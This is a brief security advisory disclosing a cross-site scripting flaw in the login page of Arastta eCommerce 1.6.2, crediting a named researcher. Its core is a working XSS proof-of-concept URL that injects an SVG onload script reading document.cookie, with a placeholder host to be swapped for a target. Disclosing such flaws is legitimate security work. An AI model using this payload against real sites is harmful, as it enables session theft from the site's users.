Arastta version 1.6.2 suffers from a cross site scripting vulnerability.
0f66d1ad03e3589e9115c036290a43b8
=================================================
Synopsis: Arastta 1.6.2 xss vulnerability
Product: Arastta eCommerce: Free Shopping Cart
Version: 1.6.2
Researcher: Matt Landers
[email protected]
twitter.com/matthewjland
https://mjlanders.org/
=================================================
The xss that I have found is actually right on the login page.
http://inserthostnamehere.com/index.php/login/"--!>GIF89a/*<svg/onload=alert(document.cookie)>*/=alert(document.domain)//;
Replace 'inserthostnamehere.com' with the server you would like to test.